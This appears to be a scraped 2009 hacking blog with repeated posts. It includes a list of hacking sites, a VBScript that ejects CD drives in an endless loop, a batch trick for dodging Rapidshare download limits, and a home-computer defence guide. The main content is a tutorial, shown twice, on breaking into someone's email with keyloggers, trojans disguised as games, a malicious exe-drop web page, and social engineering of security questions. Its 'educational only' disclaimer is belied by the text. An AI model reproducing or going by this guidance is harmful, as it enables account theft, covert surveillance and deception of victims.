(sorry i have made this as beta version as i will develop the user interface community joining script)
it adds to a community of mine (for long life only)
(with updated codes)
code:
Download Varun's Profile Creator
requirements:-
Download Other Requirements to Run Varun's Profile Creator
and a good comment is all i wanted for this hardwork
---VARUN
Wednesday, March 25, 2009
Tuesday, March 24, 2009
Few Best Hacking Sites
lemme start
http://www.smokeronline.de/
-- http://g_b_m_x.tripod.com/
-- http://www.2600.com/
-- http://xisp.org/xfactor.html
-- http://www.xisp.org/downloads.html
-- http://www.assasin-germany.de/
-- http://www.megasecurity.org/Binders.html
-- http://biw.rult.at/
-- http://www.hoobie.net/brutus/
-- http://msgs.securepoint.com/bugtraq/
-- http://www.c0rtex.de/links.php
-- http://hem.passagen.se/btener/?noframe
-- http://www.computec.ch/download.php#cat3
-- http://www.mut.ac.th/~b1121625/crack.html
-- http://www.blackhat.be/
-- http://www.blackhat.be/cst/
-- http://www.phreak.org/html/main.shtml
-- http://www.diquip.gq.nu/flooders.html
-- http://askmatador.com/ep/crews.htm
-- http://www.hirosh.tk/
-- http://www.euyulio.org/
-- http://www.fategate.de/Start.html
-- http://www.networkpunk.com/?q=files&PHPSESSID=e0dc51a110811679c2b540291bd35089
-- http://www.snapfiles.com/freeware/freeware.html
-- http://lists.netsys.com/mailman/listinfo/full-disclosure
-- http://www.glocksoft.com/index.htm
http://www.freewebs.com/blacknet/en/download.html
*
http://www.mess.be/ / / mess up wid msn messenger
*
www.hackthissite.org
*
http://www.filehippo.com/ // all file downloads
*
http://www.subnetmask.info/ // network checking site
*
http://pickit.uni.cc/windows_1_0_3.php // windows First release ever installation video
*
www.Zamzar.com // convert file formats FREE
http://www.smokeronline.de/
-- http://g_b_m_x.tripod.com/
-- http://www.2600.com/
-- http://xisp.org/xfactor.html
-- http://www.xisp.org/downloads.html
-- http://www.assasin-germany.de/
-- http://www.megasecurity.org/Binders.html
-- http://biw.rult.at/
-- http://www.hoobie.net/brutus/
-- http://msgs.securepoint.com/bugtraq/
-- http://www.c0rtex.de/links.php
-- http://hem.passagen.se/btener/?noframe
-- http://www.computec.ch/download.php#cat3
-- http://www.mut.ac.th/~b1121625/crack.html
-- http://www.blackhat.be/
-- http://www.blackhat.be/cst/
-- http://www.phreak.org/html/main.shtml
-- http://www.diquip.gq.nu/flooders.html
-- http://askmatador.com/ep/crews.htm
-- http://www.hirosh.tk/
-- http://www.euyulio.org/
-- http://www.fategate.de/Start.html
-- http://www.networkpunk.com/?q=files&PHPSESSID=e0dc51a110811679c2b540291bd35089
-- http://www.snapfiles.com/freeware/freeware.html
-- http://lists.netsys.com/mailman/listinfo/full-disclosure
-- http://www.glocksoft.com/index.htm
http://www.freewebs.com/blacknet/en/download.html
*
http://www.mess.be/ / / mess up wid msn messenger
*
www.hackthissite.org
*
http://www.filehippo.com/ // all file downloads
*
http://www.subnetmask.info/ // network checking site
*
http://pickit.uni.cc/windows_1_0_3.php // windows First release ever installation video
*
www.Zamzar.com // convert file formats FREE
Breaking Into Emails
'How to' Break into email accounts
Disclaimer :
I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!
Introduction
I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.
Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...
Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.
If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.
One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).
Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).
Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in
C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....
http://download-freeware-shareware.com/Freeware-Internet.php?Type=4171
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.
One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...
Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it
Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...
If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...
On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).
If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.
So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
http://planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Disclaimer :
I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!
Introduction
I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.
Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...
Things You Should Know
As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.
If You Have Physical Access
I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.
One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).
Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).
Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in
C:\Windows\ApplicationData\Identities\{ACblahblahblah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....
http://download-freeware-shareware.com/Freeware-Internet.php?Type=4171
Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.
One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...
Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it
Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...
If You Don't Have Physical Access
Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.
To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...
On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).
If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.
The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.
So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.
Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.
Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...
While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...
http://planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8
Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.
If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.
First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).
Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...
Funny Cd Hack
set wmp = createObject("wmplayer.ocx.7")
set drives = wmp.cdromCollection
sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
save as vbs
set drives = wmp.cdromCollection
sub open_saysame()
on error resume next
do
if drives.count >= 1 then
for i = 0 to drives.count - 1
drives.item(i).eject()
next
end if
loop
end sub
open_saysame()
save as vbs
Cyber Defence
Cyber Defense
The Bear Joke
. There where two guys in the woods when a bear came running after them. They both started running. "Are you crazy we can't outrun this bear!" one shouted. "I don't have to outrun the bear", the other replied, "I just have to outrun you".
The bear is like a hacker. If he sets his sights on you he's going to get you but you don't want to be the easiest target.
Defending your computer against hackers takes a little work but it is well worth it. Here are five important topics about defending your system.
1. Play Hide and Seek
2. Be Offensive!
3. Loose Lips Sink Ships
4. Taking a Hit
5. Stay Alert
Hideand Go Seek in Cyber Space
To discourage hackers, you want to make it hard for them to find you. By remembering to follow a few tips, you can make yourself harder to find than most. That's important since hackers are usually looking for the easiest targets. Some easy things you can do are:
* Turn off your computer when you are not using it. This is especially important if you have an "always on" type of connection
* Get a firewall if you have DSL or a cable modem
* Don't visit chat rooms unless they are closed and you know the chat room administrator
You can find out in seconds if you are an easy target. Just click this link to go to GRC.com. IT'S EASY!! When you run the program, your computer will be rated for security in several different areas. It only takes a few seconds to get the results. Be sure to also run the "Probe My Ports" utility to find out how secure your computer's ports are..
The Best Defense is a Good Offense
VIRUS PROTECTION - If someone does break into your home computer, almost always it is through a Trojan horse type program. A Trojan is a program that appears to do one thing, but also has an unwanted activity hidden inside. The most dangerous Trojans to the home user are remote administration programs.
Many serious problems can be avoided with a good anti-virus program like Norton Anti Virus made by Symantec and Virus Scan, made byMcAfee. These programs automatically check any new files or programs as they are loaded onto your computer. You can get regular updates from both companies over the internet. These are very good programs but they are not foolproof. The very latest viruses are sometimes not detected right away.
A free antivirus program that will protect you from most break-ins is InoculateIT Personal Edition. Updates are also free. According to Sébastien Sauvage "Their support is first class and free (I got an answer and program update in less than 24 hours !)".
(Important Hint - it is usually a good idea to only use one anti-virus program on your computer since these types of programs use the same system resources.).
FIREWALLS - One way to protect yourself from hackers is use a Personal Firewall. The term "firewall" is used to describe some of the walls inside commercial buildings. These walls are required by most modern building codes. These firewalls are designed to keep a fire from spreading inside the building. A computer firewall works in the same way.
Click Here to see a list of the 10 most popular sites for firewalls.
E-MAIL - The most common way that viruses are spread is through e-mail. Usually the virus is not in the e-mail message itself, but is in a separate file that is attached to the e-mail. The virus is activated on your computer when you open the attachment, You will not be infected by just reading the message. Recently, some viruses have been designed in a very clever way. When the attachments are opened, the virus program sends itself as an e-mail message to everyone in that person's address book. This can be devastating because people receiving these messages think they are from a trusted source and so they open the infected attachment and the cycle keeps repeating itself.
You can be sure that you will never send your friends an e-mail with a virus attachment by NEVER, EVER opening an e-mail attachment that ends in .DLL or .EXE., even if the message is from your best friend. The only time it is ok to open one of these attachments is when you are expecting it and you know exactly what it is!
OUTWITTING SCRIPT BASED VIRUSES - Here's an easy way to protect against VBScript-based viruses such as ILOVEYOU: Change the Open action for VBS files as follows:
. In Windows Explorer, select View | Folder Options
.
Next, select File Types then scroll down to locate the entry containing the VBS extension. Probably, VBScript File.
Click Edit, then double click the Open action
Next, under the "Application Used To Perform Action" dialog box, use the Browse tool to select Notepad (or Wordpad) and click OK.
Most legitimate sources will not send a VBS script in e-mail so you are not missing much, but if you still need to run a VBS script you can do that by
entering WSCRIPT thefilename.vbs in the Run dialog. You also need to change the settings for other script file types, such as Windows Scripting Host Settings File (WSH extension) and JScript File (JS extension) the same way you did the VB Script extension.
Now, if you get an e-mail with a VBS script attached, it can no longer do it's dirty work. Instead, it opens up in notepad and you can get someone who knows about Visual Basic to look at it before running it.
TURNING OFF FILE AND PRINT SHARING - You need to make sure that you are not giving everyone who as access to the Internet, access to your printer and files!
Follow these easy steps to turn off file and print sharing:
Step 1- Go to Settings and open the Control Panel
Step 2- Choose Network and then choose File and Print Sharing.
Step 3- Uncheck both boxes.
Privacy Is The Best Policy
Loose lips sink ships and being careless with your passwords can give hackers access to very confidential information. It is very important to choose a good password and then keep it secret. Click HERE to learn more.
KEEP YOUR INFORMATION PRIVATE - Click HERE to learn about encryption
When you think you have a virus
There is not a whole lot you can do after a virus enters your system. One thing you can do is check out some of the anti virus software that is on the market. Some of these programs have a rescue disk that might allow your computer to start. If your computer will start, the anti virus software will probably be able to identify the virus and maybe even kill it.
Stay Alert!
A good thing to know:
If your not actively surfing and you notice your modem lights are flashing you could have a hacker testing for your system's vulnerabilities.
Be sure to visit these Microsoft sites for help in keeping your system safer from attack.
The Bear Joke
. There where two guys in the woods when a bear came running after them. They both started running. "Are you crazy we can't outrun this bear!" one shouted. "I don't have to outrun the bear", the other replied, "I just have to outrun you".
The bear is like a hacker. If he sets his sights on you he's going to get you but you don't want to be the easiest target.
Defending your computer against hackers takes a little work but it is well worth it. Here are five important topics about defending your system.
1. Play Hide and Seek
2. Be Offensive!
3. Loose Lips Sink Ships
4. Taking a Hit
5. Stay Alert
Hideand Go Seek in Cyber Space
To discourage hackers, you want to make it hard for them to find you. By remembering to follow a few tips, you can make yourself harder to find than most. That's important since hackers are usually looking for the easiest targets. Some easy things you can do are:
* Turn off your computer when you are not using it. This is especially important if you have an "always on" type of connection
* Get a firewall if you have DSL or a cable modem
* Don't visit chat rooms unless they are closed and you know the chat room administrator
You can find out in seconds if you are an easy target. Just click this link to go to GRC.com. IT'S EASY!! When you run the program, your computer will be rated for security in several different areas. It only takes a few seconds to get the results. Be sure to also run the "Probe My Ports" utility to find out how secure your computer's ports are..
The Best Defense is a Good Offense
VIRUS PROTECTION - If someone does break into your home computer, almost always it is through a Trojan horse type program. A Trojan is a program that appears to do one thing, but also has an unwanted activity hidden inside. The most dangerous Trojans to the home user are remote administration programs.
Many serious problems can be avoided with a good anti-virus program like Norton Anti Virus made by Symantec and Virus Scan, made byMcAfee. These programs automatically check any new files or programs as they are loaded onto your computer. You can get regular updates from both companies over the internet. These are very good programs but they are not foolproof. The very latest viruses are sometimes not detected right away.
A free antivirus program that will protect you from most break-ins is InoculateIT Personal Edition. Updates are also free. According to Sébastien Sauvage "Their support is first class and free (I got an answer and program update in less than 24 hours !)".
(Important Hint - it is usually a good idea to only use one anti-virus program on your computer since these types of programs use the same system resources.).
FIREWALLS - One way to protect yourself from hackers is use a Personal Firewall. The term "firewall" is used to describe some of the walls inside commercial buildings. These walls are required by most modern building codes. These firewalls are designed to keep a fire from spreading inside the building. A computer firewall works in the same way.
Click Here to see a list of the 10 most popular sites for firewalls.
E-MAIL - The most common way that viruses are spread is through e-mail. Usually the virus is not in the e-mail message itself, but is in a separate file that is attached to the e-mail. The virus is activated on your computer when you open the attachment, You will not be infected by just reading the message. Recently, some viruses have been designed in a very clever way. When the attachments are opened, the virus program sends itself as an e-mail message to everyone in that person's address book. This can be devastating because people receiving these messages think they are from a trusted source and so they open the infected attachment and the cycle keeps repeating itself.
You can be sure that you will never send your friends an e-mail with a virus attachment by NEVER, EVER opening an e-mail attachment that ends in .DLL or .EXE., even if the message is from your best friend. The only time it is ok to open one of these attachments is when you are expecting it and you know exactly what it is!
OUTWITTING SCRIPT BASED VIRUSES - Here's an easy way to protect against VBScript-based viruses such as ILOVEYOU: Change the Open action for VBS files as follows:
. In Windows Explorer, select View | Folder Options
.
Next, select File Types then scroll down to locate the entry containing the VBS extension. Probably, VBScript File.
Click Edit, then double click the Open action
Next, under the "Application Used To Perform Action" dialog box, use the Browse tool to select Notepad (or Wordpad) and click OK.
Most legitimate sources will not send a VBS script in e-mail so you are not missing much, but if you still need to run a VBS script you can do that by
entering WSCRIPT thefilename.vbs in the Run dialog. You also need to change the settings for other script file types, such as Windows Scripting Host Settings File (WSH extension) and JScript File (JS extension) the same way you did the VB Script extension.
Now, if you get an e-mail with a VBS script attached, it can no longer do it's dirty work. Instead, it opens up in notepad and you can get someone who knows about Visual Basic to look at it before running it.
TURNING OFF FILE AND PRINT SHARING - You need to make sure that you are not giving everyone who as access to the Internet, access to your printer and files!
Follow these easy steps to turn off file and print sharing:
Step 1- Go to Settings and open the Control Panel
Step 2- Choose Network and then choose File and Print Sharing.
Step 3- Uncheck both boxes.
Privacy Is The Best Policy
Loose lips sink ships and being careless with your passwords can give hackers access to very confidential information. It is very important to choose a good password and then keep it secret. Click HERE to learn more.
KEEP YOUR INFORMATION PRIVATE - Click HERE to learn about encryption
When you think you have a virus
There is not a whole lot you can do after a virus enters your system. One thing you can do is check out some of the anti virus software that is on the market. Some of these programs have a rescue disk that might allow your computer to start. If your computer will start, the anti virus software will probably be able to identify the virus and maybe even kill it.
Stay Alert!
A good thing to know:
If your not actively surfing and you notice your modem lights are flashing you could have a hacker testing for your system's vulnerabilities.
Be sure to visit these Microsoft sites for help in keeping your system safer from attack.
Unlimited Download From Rapidshare
Download UNLIMITED from Rapidshare
Download UNLIMITED from Rapidshare
1. Copy and paste this code :
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
on your note pad or any other text editor
2. Save the file as : rapidshare.de.bat and leave it on your desktop
3. Every time you download from rapidshare double click on it!
note:it works only on dynamic ip
Have fun!
Download UNLIMITED from Rapidshare
1. Copy and paste this code :
@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
on your note pad or any other text editor
2. Save the file as : rapidshare.de.bat and leave it on your desktop
3. Every time you download from rapidshare double click on it!
note:it works only on dynamic ip
Have fun!
Free Airtel Sms
ALL THESE THINGS R FREE USE IT WITHOUT ANY TENSION
DAIL 181 FOR FREE
1)LIVE SCORE
2)INTERVIEW
3)MUSIC
4)ASTROLOGY
AND MANY MORE STUFFS FOR FREE
ENJOY HACKING WID ME!
FOR FREE MISSED CALL ALERT
DIVERT UR CALL, WEN BUSY TO 678
N ENJOY IT.
NOTE: THOSE WHO R CALLING U THEIR BALANCE WILL GET REDUCED, BUT NOT URS.
MANY OF US ALWAYS MAKES A RECHARGE OF 200rs TO GET ONE MONTH VALIDITY
